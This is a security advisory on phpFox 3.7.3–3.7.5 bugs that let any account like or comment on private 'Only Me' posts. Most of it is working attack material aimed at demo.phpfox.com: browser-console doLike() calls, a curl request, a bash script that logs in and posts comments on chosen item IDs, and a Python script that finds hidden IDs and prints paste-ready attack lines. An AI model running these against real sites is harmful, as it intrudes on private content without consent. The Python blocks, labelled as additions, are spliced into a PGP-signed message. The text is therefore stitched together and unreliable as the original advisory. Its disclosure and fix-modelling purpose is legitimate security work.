PHPFox 3.7.5 Authorization Bypass

2014-04-05T00:00:00
ID PACKETSTORM:126035
Type packetstorm
Reporter Wesley Henrique Leite
Modified 2014-04-05T00:00:00

Description

                                        
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256  
  
CNA primary  
MITRE Corporation ( cve-assign@mitre.org )  
  
  
Software Vendors  
PHPFox ( http://www.phpfox.com )  
Product ( http://demo.phpfox.com )  
Version: v3.7.3, v3.7.4 and v3.7.5  
  
Research  
Wesley Henrique Leite ( wesleyhenrique [\\NOSPAM**] gmail \\NOSPAM// com )  
  
  
[+] INFORMATION  
Vendor Notified : 2013-12-13  
Vendor Homepage : www.phpfox.com  
  
[+] CVEID  
CVE-2013-7195  
CVE-2013-7196  
  
Released fix 2014-02-26:  
[+] Flag as "like" a publication set to "Only Me"  
Update to version v3.7.5  
Released fix 2014-04-03:  
[+] Comment on a publication set to "Only Me"  
Update to version v3.7.6  
  
Description of the problem:  
[ + ] Flag as "like" a publication set to "Only Me" (v3.7.3 and v3.7.4)  
[ + ] Comment on a publication set to "Only Me" (v3.7.3, v3.7.4 and v3.7.5)  
  
  
[ + ] Flag as "like" a publication set to "Only Me" (v3.7.3 and v3.7.4)  
  
  
By analyzing how a "comment" and a "like" are attached to a publication, it
was possible to manipulate the requests so that a publication set to
"Only Me" receives a comment, or is marked as "like", from an outside
account that has no relationship at all with the owner. Private ("Only Me")
publications are easy to locate: every publication carries a sequential
unique identifier, and the identifiers visible in the page source leave
gaps exactly where the hidden ones sit.
  
  
$Core.Like.Actions.doLike(0, 'user_status', 26, 0, this);  
$Core.Like.Actions.doLike(0, 'user_status', 28, 0, this);  
$Core.Like.Actions.doLike(0, 'user_status', 30, 0, this);  
$Core.Like.Actions.doLike(0, 'user_status', 33, 0, this);  
  
  
Unique ID    Possible privacy
26           public
27           removed or private
28           public
29           removed or private
30           public
31           removed or private
32           removed or private
33           public
  
  
The same logic applies to the other publication types, such as videos,
links and so on.
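The gap hunting described above, as an added example that is not part of the advisory and not phpFox code: a small Python script that pulls every doLike() call out of a saved page source, groups the IDs by item type, and lists the IDs missing from each sequence, which are the "removed or private" candidates. The sample HTML is constructed to reproduce the four calls quoted above, plus two photo items to show that it generalizes across types; the markup around the calls is assumed, only the doLike() signature comes from the page.

```python
"""Find candidate private/removed item IDs from the gaps in the ID sequence
that phpFox 3.x exposes through its inline doLike() handlers.

Added example for this advisory; not phpFox code and not the researcher's
script.  SAMPLE_HTML is constructed; on a real target pass the saved source
of a profile or feed page instead.
"""
import re
from collections import defaultdict

# Matches the inline handler rendered next to every feed item, e.g.
#   $Core.Like.Actions.doLike(0, 'user_status', 26, 0, this);
# and captures the item type (2nd argument) and the item id (3rd argument).
DOLIKE_RE = re.compile(
    r"\$Core\.Like\.Actions\.doLike\(\s*\d+\s*,\s*'([a-z_]+)'\s*,\s*(\d+)"
)

# Constructed sample: the four calls quoted in the advisory plus two photos.
SAMPLE_HTML = """
<a href="#" onclick="$Core.Like.Actions.doLike(0, 'user_status', 26, 0, this);">Like</a>
<a href="#" onclick="$Core.Like.Actions.doLike(0, 'user_status', 28, 0, this);">Like</a>
<a href="#" onclick="$Core.Like.Actions.doLike(0, 'user_status', 30, 0, this);">Like</a>
<a href="#" onclick="$Core.Like.Actions.doLike(0, 'user_status', 33, 0, this);">Like</a>
<a href="#" onclick="$Core.Like.Actions.doLike(0, 'photo', 5, 0, this);">Like</a>
<a href="#" onclick="$Core.Like.Actions.doLike(0, 'photo', 8, 0, this);">Like</a>
"""


def visible_ids(html):
    """Return {item_type: sorted list of ids} for every doLike() call in html."""
    seen = defaultdict(set)
    for item_type, item_id in DOLIKE_RE.findall(html):
        seen[item_type].add(int(item_id))
    return {t: sorted(ids) for t, ids in seen.items()}


def candidate_ids(html):
    """Return {item_type: ids missing from the visible sequence}.

    A missing id is either a deleted item or one the current viewer is not
    allowed to see (for example privacy "Only Me"); those are the ids the
    advisory's like/comment requests are aimed at.
    """
    gaps = {}
    for item_type, ids in visible_ids(html).items():
        present = set(ids)
        gaps[item_type] = [i for i in range(ids[0], ids[-1] + 1) if i not in present]
    return gaps


def like_call(item_type, item_id):
    """Render the console one-liner the advisory uses to like a hidden item."""
    return "$Core.Like.Actions.doLike(0, '%s', %d, 0, this);" % (item_type, item_id)


if __name__ == "__main__":
    # Print one console line per candidate id, ready to paste into the browser.
    for item_type, ids in candidate_ids(SAMPLE_HTML).items():
        for item_id in ids:
            print(like_call(item_type, item_id))
```

Only the first and last visible ID of each type bound the search, so items older than the oldest one on the page are not covered; paging further back in the feed widens the range.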
  
  
To give an example, assume that the post with ID 27 is private ("Only Me").
To mark post 27 as "like", it is enough to run the line below in the
browser's JavaScript console while logged in as any account:
  
  
javascript console:  
$Core.Like.Actions.doLike(0, 'user_status', 27, 0, this);  
  
  
The owner's account is notified, and the user who ran the code above
appears on that same publication as having marked it "like".
  
  
The above problem is present in versions v3.7.3 and v3.7.4, all builds.
  
  
[ + ] Comment on a publication set to "Only Me" (v3.7.3, v3.7.4 and v3.7.5)  
  
  
Following the logic above, we can identify candidate private publications.
We take ID 27, remembering that it is private ("Only Me"), and add a comment to it.
  
  
These are the POST parameters of a comment request, as captured from a logged-in browser session:
  
  
&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7  
&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0&  
val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!&  
core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290  
  
  
Parameters that can be manipulated:
  
  
val[text] -------> Text of comment  
val[type] -------> user_status, photo, music_song, poll, link, blog  
val[item_id] -------> Unique ID  
  
  
To make the process more dynamic, the script further below was created. The same request can be issued directly with curl, supplying the cookie and headers of your own account:
  
  
$ curl 'http://demo.phpfox.com/static/ajax.php' \
  -b 'SET HERE THE COOKIE OF YOUR USER ACCOUNT' \
  -H 'X-Requested-With: XMLHttpRequest' \
  --data '&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0&val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290'
  
The same parameters can also be manipulated directly in the browser console.
  
The above problem is present in versions v3.7.3, v3.7.4 and v3.7.5, all builds.
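What the server fails to check, shown as an added example rather than phpFox source: the handler below models comment.add with the parameters from the captured request. The vulnerable version validates only the session's security_token (a CSRF check) before writing, which is the behaviour both bypasses above rely on; the fixed version also runs an object-level check that the requester may view the target item, which is what "Only Me" is supposed to enforce. The data model, the numeric privacy levels, the stranger and friend user IDs, and the token-to-user mapping are assumptions made for the example; only user 290, item 27 and the token value come from the advisory.

```python
"""Why the like/comment bypass works, and what the missing check looks like.

Added example for this advisory; not phpFox source.  The storage model,
the privacy level numbers and every user id except 290 are assumptions.
Both handlers take the parameters the advisory shows for comment.add.
"""
import hmac

# Privacy levels as the example assumes phpFox stores them
# (UI labels: Everyone, Friends, Friends of friends, Only Me).
PRIVACY_EVERYONE = 0
PRIVACY_FRIENDS = 1
PRIVACY_FRIENDS_OF_FRIENDS = 2
PRIVACY_ONLY_ME = 3

# Constructed data: user 290 owns status 26 (public) and status 27
# ("Only Me"); user 42 is a friend of 290; user 17 is a stranger.
ITEMS = {
    ("user_status", 26): {"user_id": 290, "privacy": PRIVACY_EVERYONE},
    ("user_status", 27): {"user_id": 290, "privacy": PRIVACY_ONLY_ME},
}
FRIENDS = {290: {42}, 42: {290}, 17: set()}
# Constructed: the advisory's token value bound to the stranger's session.
SESSION_TOKENS = {17: "686f82ec43f7dcd92784ab36ab5cbfb7"}


class Forbidden(Exception):
    pass


def token_ok(user_id, token):
    """CSRF check only: proves the request came from user_id's own page."""
    expected = SESSION_TOKENS.get(user_id, "")
    return hmac.compare_digest(expected, token)


def can_view(item, viewer_id):
    """Object-level authorization: may viewer_id see this item at all?"""
    owner = item["user_id"]
    if viewer_id == owner:
        return True
    privacy = item["privacy"]
    if privacy == PRIVACY_EVERYONE:
        return True
    if privacy == PRIVACY_FRIENDS:
        return viewer_id in FRIENDS.get(owner, set())
    if privacy == PRIVACY_FRIENDS_OF_FRIENDS:
        return any(viewer_id in FRIENDS.get(f, set()) for f in FRIENDS.get(owner, set()))
    return False  # PRIVACY_ONLY_ME, and any unknown level, is owner-only


def comment_add_vulnerable(user_id, params, store):
    """Mirrors the affected behaviour: a valid token and an existing item suffice."""
    if not token_ok(user_id, params["core[security_token]"]):
        raise Forbidden("bad security_token")
    key = (params["val[type]"], int(params["val[item_id]"]))
    if key not in ITEMS:
        raise KeyError("no such item")
    store.append((key, user_id, params["val[text]"]))
    return True


def comment_add_fixed(user_id, params, store):
    """Same handler plus the missing check: the target must be visible to the requester."""
    if not token_ok(user_id, params["core[security_token]"]):
        raise Forbidden("bad security_token")
    key = (params["val[type]"], int(params["val[item_id]"]))
    item = ITEMS.get(key)
    # One error for "does not exist" and "not allowed to see", so the
    # response does not confirm that a hidden item id is live.
    if item is None or not can_view(item, user_id):
        raise Forbidden("item not found")
    store.append((key, user_id, params["val[text]"]))
    return True


# The captured request body, decoded, as sent by the stranger (user 17)
# against the "Only Me" status 27.
ATTACK = {
    "core[security_token]": "686f82ec43f7dcd92784ab36ab5cbfb7",
    "val[type]": "user_status",
    "val[item_id]": "27",
    "val[text]": "AQUI!!!!!!!!!!!",
}


def run_both():
    """Return (comments written by vulnerable handler, by fixed handler)."""
    vuln_store, fixed_store = [], []
    comment_add_vulnerable(17, ATTACK, vuln_store)
    try:
        comment_add_fixed(17, ATTACK, fixed_store)
    except Forbidden:
        pass
    return len(vuln_store), len(fixed_store)
```

The like endpoint needs the same can_view() gate; the CSRF token proves who is asking, never whether they may touch the item they name.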
  
################  
# SCRIPT  
################  
#!/bin/bash

# This script was developed to demonstrate the problem to the phpFox
# development team; it can easily be adapted for testing other
# applications that use the framework by adjusting the variable
# "${TARGET}".
#
# Comments are published with the credentials defined in the variables
#
# USERACCOUNT = "your_mail%40example.com"
# USERPASSWD = "your_password"
#
# Even when there is no relationship between the users, or when the
# publication is set to "Only Me" (the case this study focuses on),
# the comment is added.
#
# Wesley Henrique Leite
# wesleyhenrique **(A)** gmail **NOSPAM** com
# wesley **(A)** telapreta **NOSPAM** com **NOSPAM** br
#
# USAGE:
# $ comment_only-me.bash <user_status|photo|music_song|poll|link|blog> 777 'Hello all'
#

#AUTH
# encode the "@" of the account as %40 -> teste%40example.com
USERACCOUNT=""
USERPASSWD=""
COOKIE=cookie.txt
SECTOKEN=""
TYPE="$1"
ITEM_ID=$2
MSG="$3"
TARGET="http://demo.phpfox.com"
URL_LOGIN="${TARGET}/user/login"
URL_AJAX="${TARGET}/static/ajax.php"
USER_AGENT="User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"

USAGE="Type, Item_id and MSG are required\n $0 <user_status|photo|music_song|poll|link|blog> 777 'Hello all' "

[ -z "${USERACCOUNT}" -o \
  -z "${USERPASSWD}" ] && {
  echo "Open $0 file and edit USERACCOUNT and USERPASSWD"
  exit 1
}

[ $# -eq 3 -a \
  ! -z "${TYPE}" -a \
  ! -z "${ITEM_ID}" -a \
  ! -z "${MSG}" ] || { echo -e "${USAGE}" ; exit 1 ; }

>${COOKIE}

# GET COOKIE AND SECURITY_TOKEN
# The front page sets the session cookie (dumped with -D, read back by -b,
# which accepts Set-Cookie headers) and embeds the 32-hex security_token.
SECTOKEN=$(curl -D ${COOKIE} ${TARGET} |
  grep 'security_token' |
  grep -Ewo '([a-f0-9A-F]){32}' |
  sort -u)

# AUTH USER
# SAVE COOKIE
curl "${URL_LOGIN}" \
  -b "${COOKIE}" \
  -H "Origin: ${TARGET}" \
  -H 'Accept-Encoding: gzip,deflate,sdch' \
  -H 'Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.6,en;q=0.4' \
  -H "${USER_AGENT}" \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \
  -H 'Cache-Control: max-age=0' \
  -H 'Connection: keep-alive' \
  -D ${COOKIE} \
  --data "core%5Bsecurity_token%5D=${SECTOKEN}&val%5Blogin%5D=${USERACCOUNT}&val%5Bremember_me%5D=&val%5Bpassword%5D=${USERPASSWD}" \
  --compressed


### COMMENT ADD
# Same parameters as the captured comment.add request. The server only
# checks the logged-in session and its security_token; the privacy of the
# target item is never compared against the requesting account.
curl "${URL_AJAX}" \
  -b "${COOKIE}" \
  -H "Origin: ${TARGET}" \
  -H "${USER_AGENT}" \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Connection: keep-alive' \
  --data "&core[ajax]=true&core[call]=comment.add&core[security_token]=${SECTOKEN}&val[type]=${TYPE}&val[item_id]=${ITEM_ID}&val[parent_id]=0&val[is_via_feed]=${ITEM_ID}&val[default_feed_value]=Write%20a%20comment...&val[text]=${MSG}&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290" \
  --compressed
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.12 (GNU/Linux)  
  
iF4EAREIAAYFAlM/lEEACgkQd9Htm4AVoW9ToAEAnnZogdYRlKCi3RDfJgkLvbK8  
RIQcsz5fsiU9d3nrVKwBAIJFfcsdfVspUpExdtuEFgPJ7Sj7thHURfVHvFGSXvvj  
=6hMg  
-----END PGP SIGNATURE-----  